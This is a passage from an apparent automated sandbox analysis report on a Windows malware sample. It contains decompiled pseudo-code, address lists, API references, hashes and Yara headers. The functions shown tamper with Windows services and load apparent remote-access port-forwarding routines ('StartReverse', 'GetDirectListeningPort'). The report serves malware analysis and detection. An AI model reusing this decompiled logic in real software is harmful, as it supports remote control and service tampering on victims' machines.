												_push(_t125);
												_push(_t125);
												goto L20;
											} else {
												__eflags = _t86 - 0x22;
												if(_t86 != 0x22) {
													__eflags = _t86;
													if(_t86 == 0) {
														goto L29;
													} else {
														E00437795(_t99);
														goto L15;
													}
												} else {
													goto L26;
												}
											}
										}
									}
								} else {
									__eflags = _t79 - 0x16;
									if(_t79 == 0x16) {
										L19:
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L20:
										_t79 = E00430CA7();
									} else {
										__eflags = _t79 - 0x22;
										if(_t79 == 0x22) {
											goto L19;
										}
									}
									__eflags = _t79;
									if(_t79 != 0) {
										goto L15;
									} else {
										goto L22;
									}
								}
							} else {
								L15:
							}
							return E00429356();
						} else {
							__eflags = _t67 - 0x22;
							if(_t67 == 0x22) {
								goto L13;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t70 = E00435CA3(__ebx, _t101, __edx, _a4, 0);
					L12:
					return _t70;
				}
			}


































                                            0x004366f5
                                            0x004366f5
                                            0x004366fa
                                            0x004366ff
                                            0x0043670f
                                            0x00436710
                                            0x00436719
                                            0x00436721
                                            0x00436726
                                            0x00436729
                                            0x0043672b
                                            0x00436737
                                            0x00436741
                                            0x00436744
                                            0x00436745
                                            0x00436747
                                            0x00436778
                                            0x00436779
                                            0x0043677f
                                            0x00000000
                                            0x00436749
                                            0x00436753
                                            0x00436758
                                            0x0043675b
                                            0x0043675d
                                            0x00436776
                                            0x00000000
                                            0x0043675f
                                            0x0043675f
                                            0x00436762
                                            0x00000000
                                            0x00436764
                                            0x00436764
                                            0x00436767
                                            0x00000000
                                            0x00436769
                                            0x00000000
                                            0x00436769
                                            0x00436767
                                            0x00436762
                                            0x0043675d
                                            0x0043672d
                                            0x0043672d
                                            0x00436730
                                            0x00436787
                                            0x00436787
                                            0x00436788
                                            0x00436789
                                            0x0043678a
                                            0x0043678c
                                            0x00436791
                                            0x00436799
                                            0x004367a1
                                            0x004367a5
                                            0x004367ab
                                            0x004367ac
                                            0x004367ae
                                            0x004367b0
                                            0x004367b9
                                            0x004367be
                                            0x004367c4
                                            0x004367c7
                                            0x004367ca
                                            0x004367cf
                                            0x004367de
                                            0x004367e3
                                            0x004367e6
                                            0x004367e8
                                            0x00436802
                                            0x0043680f
                                            0x00436811
                                            0x00436813
                                            0x00000000
                                            0x00436815
                                            0x00436815
                                            0x00436818
                                            0x0043681b
                                            0x00436826
                                            0x00436829
                                            0x0043682e
                                            0x00436831
                                            0x00436833
                                            0x00436856
                                            0x00436856
                                            0x0043685b
                                            0x00436860
                                            0x00436861
                                            0x00436865
                                            0x0043686b
                                            0x0043686e
                                            0x00436870
                                            0x00436874
                                            0x00436878
                                            0x0043687e
                                            0x00436883
                                            0x00436884
                                            0x00436889
                                            0x00436889
                                            0x00436889
                                            0x00436878
                                            0x0043688c
                                            0x0043688f
                                            0x00436896
                                            0x00436898
                                            0x0043689f
                                            0x004368a5
                                            0x004368a7
                                            0x004368a9
                                            0x004368ad
                                            0x004368ae
                                            0x004368b4
                                            0x004368ba
                                            0x004368ba
                                            0x004368ba
                                            0x004368ba
                                            0x004368ae
                                            0x004368a7
                                            0x0043689f
                                            0x004368c2
                                            0x004368c4
                                            0x004368cb
                                            0x004368cf
                                            0x004368d6
                                            0x00436835
                                            0x00436835
                                            0x00436838
                                            0x0043683f
                                            0x0043683f
                                            0x00436840
                                            0x00436841
                                            0x00436842
                                            0x00436843
                                            0x00000000
                                            0x0043683a
                                            0x0043683a
                                            0x0043683d
                                            0x00436846
                                            0x00436848
                                            0x00000000
                                            0x0043684a
                                            0x0043684b
                                            0x00000000
                                            0x00436850
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043683d
                                            0x00436838
                                            0x00436833
                                            0x004367ea
                                            0x004367ea
                                            0x004367ed
                                            0x004367f4
                                            0x004367f4
                                            0x004367f5
                                            0x004367f6
                                            0x004367f7
                                            0x004367f8
                                            0x004367f9
                                            0x004367f9
                                            0x004367ef
                                            0x004367ef
                                            0x004367f2
                                            0x00000000
                                            0x00000000
                                            0x004367f2
                                            0x004367fe
                                            0x00436800
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00436800
                                            0x004367b2
                                            0x004367b2
                                            0x004367b2
                                            0x004368e2
                                            0x00436732
                                            0x00436732
                                            0x00436735
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00436735
                                            0x00436730
                                            0x00436701
                                            0x00436706
                                            0x00436783
                                            0x00436786
                                            0x00436786

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: __cftoe
                                            • String ID:
                                            • API String ID: 4189289331-0
                                            • Opcode ID: 81d692d03928e47571cb4521408e24a7fc8e34ca01f09807e6bbe2f04ce00f62
                                            • Instruction ID: ec9f5e86f4579d1c030c4d93c6caf82bd58b7efeeb0bcf7b3272860d069fa409
                                            • Opcode Fuzzy Hash: 81d692d03928e47571cb4521408e24a7fc8e34ca01f09807e6bbe2f04ce00f62
                                            • Instruction Fuzzy Hash: 70514E72901206BBDB246B69CC41EAF77B9AF4D338F55921FF81496282DB3DDD00866C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041054F, Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 76%
                                            			E0041054F(signed char __ecx, char _a4) {
				signed char _v5;
				void* _t7;
				signed int _t11;
				void* _t17;
				short* _t21;
				signed int _t24;
				int _t25;
				void* _t28;
				void* _t31;

				_push(__ecx);
				_t21 = 0;
				_v5 = __ecx;
				_t7 = OpenSCManagerW(0, 0, 2);
				_t24 =  &_a4;
				_t31 = _t7;
				_t28 = OpenServiceW(_t31, L00404090(_t24), 2);
				if(_t28 != 0) {
					_t25 = _t24 | 0xffffffff;
					_t11 = _v5 & 0x000000ff;
					if(_t11 == 0) {
						_push(4);
						goto L8;
					} else {
						_t17 = _t11 - 1;
						if(_t17 == 0) {
							_push(2);
							goto L8;
						} else {
							if(_t17 == 1) {
								_push(3);
								L8:
								_pop(_t25);
							}
						}
					}
					_t21 = _t21 & 0xffffff00 | ChangeServiceConfigW(_t28, 0xffffffff, _t25, 0xffffffff, _t21, _t21, _t21, _t21, _t21, _t21, _t21) != 0x00000000;
					CloseServiceHandle(_t31);
					CloseServiceHandle(_t28);
				} else {
					CloseServiceHandle(_t31);
				}
				E004031D1();
				return _t21;
			}












                                            0x00410552
                                            0x00410558
                                            0x0041055a
                                            0x0041055f
                                            0x00410567
                                            0x0041056a
                                            0x00410579
                                            0x0041057d
                                            0x0041058c
                                            0x0041058f
                                            0x00410591
                                            0x004105a5
                                            0x00000000
                                            0x00410593
                                            0x00410593
                                            0x00410596
                                            0x004105a1
                                            0x00000000
                                            0x00410598
                                            0x0041059b
                                            0x0041059d
                                            0x004105a7
                                            0x004105a7
                                            0x004105a7
                                            0x0041059b
                                            0x00410596
                                            0x004105c4
                                            0x004105c7
                                            0x004105ca
                                            0x0041057f
                                            0x00410580
                                            0x00410580
                                            0x004105cf
                                            0x004105dc

                                            APIs
                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0040FCAE,00000000), ref: 0041055F
                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0040FCAE,00000000), ref: 00410573
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0040FCAE,00000000), ref: 00410580
                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0040FCAE,00000000), ref: 004105B5
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0040FCAE,00000000), ref: 004105C7
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0040FCAE,00000000), ref: 004105CA
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                            • String ID:
                                            • API String ID: 493672254-0
                                            • Opcode ID: 462d9f08248bdbf7f00acaa269c63d4c562ed6dde789d02a4e99a71570c3d958
                                            • Instruction ID: 00e394c588e7576c9243323275c8e371dfe96f7dff534ac84e1d0d71cba528c6
                                            • Opcode Fuzzy Hash: 462d9f08248bdbf7f00acaa269c63d4c562ed6dde789d02a4e99a71570c3d958
                                            • Instruction Fuzzy Hash: 80012D71145224BED6209B359C4EFBB3F6CDB43371F10032BF969962C0DAA8DEC19969
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040B1BB, Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 94%
                                            			E0040B1BB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				void* _v8;
				char _v12;
				char _v24;
				char* _t33;
				void* _t38;
				intOrPtr* _t41;

				E004297F8( &_v12, 0);
				_t38 =  *0x4627f4;
				_v8 = _t38;
				_t41 = E004089F2(_a4, E0040891B(0x462900));
				if(_t41 != 0) {
					L5:
					E00429850( &_v12);
					return _t41;
				} else {
					if(_t38 == 0) {
						__eflags = E0040B28C(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
						if(__eflags == 0) {
							_t33 =  &_v24;
							E004087E1(_t33);
							E0042B694( &_v24, 0x45da24);
							asm("int3");
							E0040B355(_t33);
							return _t33;
						} else {
							_t41 = _v8;
							 *0x4627f4 = _t41;
							 *((intOrPtr*)( *_t41 + 4))();
							E00429A09(__eflags, _t41);
							goto L5;
						}
					} else {
						_t41 = _t38;
						goto L5;
					}
				}
			}









                                            0x0040b1c8
                                            0x0040b1cd
                                            0x0040b1d8
                                            0x0040b1e9
                                            0x0040b1ed
                                            0x0040b221
                                            0x0040b224
                                            0x0040b230
                                            0x0040b1ef
                                            0x0040b1f1
                                            0x0040b205
                                            0x0040b208
                                            0x0040b231
                                            0x0040b234
                                            0x0040b242
                                            0x0040b247
                                            0x0040b248
                                            0x0040b24f
                                            0x0040b20a
                                            0x0040b20a
                                            0x0040b20f
                                            0x0040b217
                                            0x0040b21b
                                            0x00000000
                                            0x0040b220
                                            0x0040b1f3
                                            0x0040b1f3
                                            0x00000000
                                            0x0040b1f3
                                            0x0040b1f1

                                            APIs
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040B1C8
                                            • int.LIBCPMT ref: 0040B1DB
                                              • Part of subcall function 0040891B: std::_Lockit::_Lockit.LIBCPMT ref: 0040892C
                                              • Part of subcall function 0040891B: std::_Lockit::~_Lockit.LIBCPMT ref: 00408946
                                            • std::locale::_Getfacet.LIBCPMT ref: 0040B1E4
                                            • std::_Facet_Register.LIBCPMT ref: 0040B21B
                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040B224
                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040B242
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                            • String ID:
                                            • API String ID: 2243866535-0
                                            • Opcode ID: d6a2208d9bc51e56e326bec04ad78c444ba21b5e3b20c82aabe3330c5c20c6ad
                                            • Instruction ID: fb880b667f064f3af3a01341925a043a079db50662afa0d5e59636b6c16706ba
                                            • Opcode Fuzzy Hash: d6a2208d9bc51e56e326bec04ad78c444ba21b5e3b20c82aabe3330c5c20c6ad
                                            • Instruction Fuzzy Hash: AE010432A00118A7CB14EBA9DA55CAE7768EF40315F20016FE805B72D1EF789E0587DD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00438D61, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 75%
                                            			E00438D61(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x45f210; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E004368EF(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E0043804F(_t25, _t36, __eflags,  *0x45f210, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00438BD3(_t25, _t31, 0x460930);
							E00437795(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00437795();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00436EF0(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x45f210; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E004368EF(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E0043804F(_t27, _t37, __eflags,  *0x45f210, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00438BD3(_t27, _t32, 0x460930);
									E00437795(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00437795();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00437FF9(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00437FF9(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                                            0x00438d61
                                            0x00438d61
                                            0x00438d61
                                            0x00438d6b
                                            0x00438d6d
                                            0x00438d72
                                            0x00438d75
                                            0x00438d83
                                            0x00438d8a
                                            0x00438d8f
                                            0x00438d92
                                            0x00438d95
                                            0x00438da7
                                            0x00438dac
                                            0x00438dae
                                            0x00438db9
                                            0x00438dc0
                                            0x00438dc5
                                            0x00438dc8
                                            0x00438dca
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00438db0
                                            0x00438db0
                                            0x00000000
                                            0x00438db0
                                            0x00438d97
                                            0x00438d97
                                            0x00438d98
                                            0x00438d98
                                            0x00438d9d
                                            0x00438dd8
                                            0x00438dd9
                                            0x00438ddf
                                            0x00438de4
                                            0x00438de7
                                            0x00438de8
                                            0x00438de9
                                            0x00438df0
                                            0x00438df2
                                            0x00438df4
                                            0x00438df9
                                            0x00438dfc
                                            0x00438e0a
                                            0x00438e16
                                            0x00438e19
                                            0x00438e1c
                                            0x00438e2e
                                            0x00438e33
                                            0x00438e35
                                            0x00438e40
                                            0x00438e46
                                            0x00438e4e
                                            0x00438e50
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00438e37
                                            0x00438e37
                                            0x00000000
                                            0x00438e37
                                            0x00438e1e
                                            0x00438e1e
                                            0x00438e1f
                                            0x00438e1f
                                            0x00438e52
                                            0x00438e53
                                            0x00438e53
                                            0x00438dfe
                                            0x00438e04
                                            0x00438e08
                                            0x00438e5b
                                            0x00438e5c
                                            0x00438e62
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00438e08
                                            0x00438e69
                                            0x00438e69
                                            0x00438d77
                                            0x00438d7d
                                            0x00438d81
                                            0x00438dcc
                                            0x00438dcd
                                            0x00438dd7
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00438d81

                                            APIs
                                            • GetLastError.KERNEL32(?,00000000,00432FF3,?,00410F24,-00462904,?,?,?,?,?,00407D90,.vbs), ref: 00438D65
                                            • _free.LIBCMT ref: 00438D98
                                            • _free.LIBCMT ref: 00438DC0
                                            • SetLastError.KERNEL32(00000000,?,00410F24,-00462904,?,?,?,?,?,00407D90,.vbs), ref: 00438DCD
                                            • SetLastError.KERNEL32(00000000,?,00410F24,-00462904,?,?,?,?,?,00407D90,.vbs), ref: 00438DD9
                                            • _abort.LIBCMT ref: 00438DDF
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$_free$_abort
                                            • String ID:
                                            • API String ID: 3160817290-0
                                            • Opcode ID: 7cd34a971771ebb8f58f6ab3745652a28057bd03d47dda37c97fa39005acbeaa
                                            • Instruction ID: e2ff41a020954f6c506a9f6c4cfd22e7b7eb491490b98164b26473f63f04e78c
                                            • Opcode Fuzzy Hash: 7cd34a971771ebb8f58f6ab3745652a28057bd03d47dda37c97fa39005acbeaa
                                            • Instruction Fuzzy Hash: 18F0443918070237C2123336BC0AE1B612A9FEA766F21252FF418922D2FF3C8C06512E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041037D, Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0041037D(char _a4) {
				struct _SERVICE_STATUS _v32;
				signed int _t16;
				void* _t19;
				void* _t20;

				_t16 = 0;
				_t20 = OpenSCManagerW(0, 0, 0x20);
				_t19 = OpenServiceW(_t20, L00404090( &_a4), 0x20);
				if(_t19 != 0) {
					_t16 = 0 | ControlService(_t19, 1,  &_v32) != 0x00000000;
					CloseServiceHandle(_t20);
					CloseServiceHandle(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				E004031D1();
				return _t16;
			}







                                            0x00410388
                                            0x00410397
                                            0x004103a6
                                            0x004103aa
                                            0x004103cb
                                            0x004103ce
                                            0x004103d1
                                            0x004103ac
                                            0x004103ad
                                            0x004103ad
                                            0x004103d6
                                            0x004103e3

                                            APIs
                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0040FF32,00000000), ref: 0041038C
                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0040FF32,00000000), ref: 004103A0
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0040FF32,00000000), ref: 004103AD
                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0040FF32,00000000), ref: 004103BC
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0040FF32,00000000), ref: 004103CE
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0040FF32,00000000), ref: 004103D1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Service$CloseHandle$Open$ControlManager
                                            • String ID:
                                            • API String ID: 221034970-0
                                            • Opcode ID: b5bfdd92adf297d66baeffdf7a6043ebadeb647382ffea8692ad73ebe0f3c7c0
                                            • Instruction ID: 1f2bc9cbc725a457cfee7bf5391e5614987e437c66bddde60934c74884cb3939
                                            • Opcode Fuzzy Hash: b5bfdd92adf297d66baeffdf7a6043ebadeb647382ffea8692ad73ebe0f3c7c0
                                            • Instruction Fuzzy Hash: 3AF096355402287BD620AF759C89EFF3B6CDB46661F000076FD0992141DF689D46A6B9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004104E8, Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004104E8(char _a4) {
				struct _SERVICE_STATUS _v32;
				signed int _t16;
				void* _t19;
				void* _t20;

				_t16 = 0;
				_t20 = OpenSCManagerW(0, 0, 0x40);
				_t19 = OpenServiceW(_t20, L00404090( &_a4), 0x40);
				if(_t19 != 0) {
					_t16 = 0 | ControlService(_t19, 3,  &_v32) != 0x00000000;
					CloseServiceHandle(_t20);
					CloseServiceHandle(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				E004031D1();
				return _t16;
			}







                                            0x004104f3
                                            0x00410502
                                            0x00410511
                                            0x00410515
                                            0x00410536
                                            0x00410539
                                            0x0041053c
                                            0x00410517
                                            0x00410518
                                            0x00410518
                                            0x00410541
                                            0x0041054e

                                            APIs
                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0040FE3C,00000000), ref: 004104F7
                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0040FE3C,00000000), ref: 0041050B
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0040FE3C,00000000), ref: 00410518
                                            • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0040FE3C,00000000), ref: 00410527
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0040FE3C,00000000), ref: 00410539
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0040FE3C,00000000), ref: 0041053C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Service$CloseHandle$Open$ControlManager
                                            • String ID:
                                            • API String ID: 221034970-0
                                            • Opcode ID: c659f197191d255b7739ee4148fae2eca01f28a87c25face606538f2653612e8
                                            • Instruction ID: 566ae0ec33a700aa11135ce0ca884db2f438f2ba16b424ae2690f4c57c81a5d2
                                            • Opcode Fuzzy Hash: c659f197191d255b7739ee4148fae2eca01f28a87c25face606538f2653612e8
                                            • Instruction Fuzzy Hash: AFF0FC755002187BD610AF65AC45EFF3B6CDF46351F000036FE0996141DF789D46A5B9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00410481, Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00410481(char _a4) {
				struct _SERVICE_STATUS _v32;
				signed int _t16;
				void* _t19;
				void* _t20;

				_t16 = 0;
				_t20 = OpenSCManagerW(0, 0, 0x40);
				_t19 = OpenServiceW(_t20, L00404090( &_a4), 0x40);
				if(_t19 != 0) {
					_t16 = 0 | ControlService(_t19, 2,  &_v32) != 0x00000000;
					CloseServiceHandle(_t20);
					CloseServiceHandle(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				E004031D1();
				return _t16;
			}







                                            0x0041048c
                                            0x0041049b
                                            0x004104aa
                                            0x004104ae
                                            0x004104cf
                                            0x004104d2
                                            0x004104d5
                                            0x004104b0
                                            0x004104b1
                                            0x004104b1
                                            0x004104da
                                            0x004104e7

                                            APIs
                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0040FEB7,00000000), ref: 00410490
                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0040FEB7,00000000), ref: 004104A4
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0040FEB7,00000000), ref: 004104B1
                                            • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0040FEB7,00000000), ref: 004104C0
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0040FEB7,00000000), ref: 004104D2
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0040FEB7,00000000), ref: 004104D5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Service$CloseHandle$Open$ControlManager
                                            • String ID:
                                            • API String ID: 221034970-0
                                            • Opcode ID: 1be29f51a0f814c9793ec7d965200b254908cec10780ac8608aa25927c4e154d
                                            • Instruction ID: 4f18046826b01654708fa1483ca33fe29750a756b14e69b93d149fad2da09f60
                                            • Opcode Fuzzy Hash: 1be29f51a0f814c9793ec7d965200b254908cec10780ac8608aa25927c4e154d
                                            • Instruction Fuzzy Hash: DAF0FC795002287BD610AF659C89EFF3B6CDB46251F00003AFF09A2141DF789D4695B9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040B586, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 145COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 72%
                                            			E0040B586(char* __edx, void* __eflags, intOrPtr _a4) {
				char _v32;
				char _v56;
				void* _v60;
				char _v72;
				char _v76;
				char _v80;
				char _v88;
				void* _v96;
				char _v108;
				char _v112;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t22;
				intOrPtr _t43;
				intOrPtr _t44;
				char* _t51;
				intOrPtr _t53;
				intOrPtr _t91;
				void* _t95;
				void* _t96;
				intOrPtr _t98;
				void* _t99;
				signed int _t102;
				void* _t105;
				void* _t106;
				void* _t107;
				void* _t111;

				_t112 = __eflags;
				_t84 = __edx;
				_push(_t53);
				_t91 = _a4;
				E004020E6(_t53,  &_v76, __edx, __eflags, _t91 + 0x1c);
				SetEvent( *(_t91 + 0x34));
				_t22 = E00401F2E( &_v80);
				E00401F0C( &_v80,  &_v56, 4, 0xffffffff);
				_t105 = (_t102 & 0xfffffff8) - 0x3c;
				E004020E6(_t53, _t105, _t84, _t112, 0x46103c);
				_t106 = _t105 - 0x18;
				E004020E6(_t53, _t106, _t84, _t112,  &_v72);
				E00411260( &_v112, _t84);
				_t107 = _t106 + 0x30;
				_t95 =  *_t22 - 0x46;
				if(_t95 == 0) {
					_t63 = E00401F2E(E004031A1( &_v88, _t84, __eflags, 1));
					_t53 = E00407275(_t30);
					__eflags = _t53;
					if(__eflags == 0) {
						_t96 = _t107 - 0x18;
						_push("1");
						goto L15;
					} else {
						_t98 = E004072CB(_t53, "StartForward");
						 *0x460cc8 = _t98;
						 *0x460cc4 = E004072CB(_t53, "StartReverse");
						_t43 = E004072CB(_t53, "StopForward");
						_t84 = "GetDirectListeningPort";
						 *0x460ccc = _t43;
						_t63 = _t53;
						_t44 = E004072CB(_t53, "GetDirectListeningPort");
						 *0x460cd0 = _t44;
						__eflags = _t98;
						if(__eflags == 0) {
							L13:
							_t96 = _t107 - 0x18;
							_push("2");
							L15:
							E00402973(_t53, _t96, E004040B9( &_v32, E004031A1( &_v88, _t84, __eflags, 0)), __eflags, _t63);
							_push(0x85);
							E00401790(_t53, _t91, _t33, __eflags);
							E00401F97();
						} else {
							__eflags =  *0x460cc4;
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags =  *0x460ccc;
								if(__eflags == 0) {
									goto L13;
								} else {
									__eflags = _t44;
									if(__eflags == 0) {
